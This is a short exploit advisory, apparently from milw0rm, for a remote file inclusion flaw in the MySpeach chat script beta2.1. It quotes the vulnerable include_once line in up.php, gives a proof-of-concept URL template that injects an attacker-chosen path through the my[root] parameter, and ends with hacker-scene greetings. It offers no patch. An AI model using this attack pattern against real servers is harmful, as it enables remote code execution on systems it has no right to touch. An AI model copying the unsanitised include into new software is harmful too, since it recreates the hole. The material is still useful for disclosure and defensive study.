------------------------------------------------------------------------------------------------------------------------ Script:MySpeach Affected Version:beta2.1 and maybe older Downlaoad:http://www.graphiks.net/scripts/chat/myspeach-2.1beta.zip ------------------------------------------------------------------------------------------------------------------------ Author:Dr Max Virus ------------------------------------------------------------------------------------------------------------------------ Bug in (up.php) Vul Code; include_once($my['root'].'/admin/funcs.php'); ------------------------------------------------------------------------------------------------------------------------ POC: http://[target]/[path]/up.php?my[root]=[Bad Code] ------------------------------------------------------------------------------------------------------------------------ Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk ------------------------------------------------------------------------------------------------------------------------ # milw0rm.com [2007-01-20]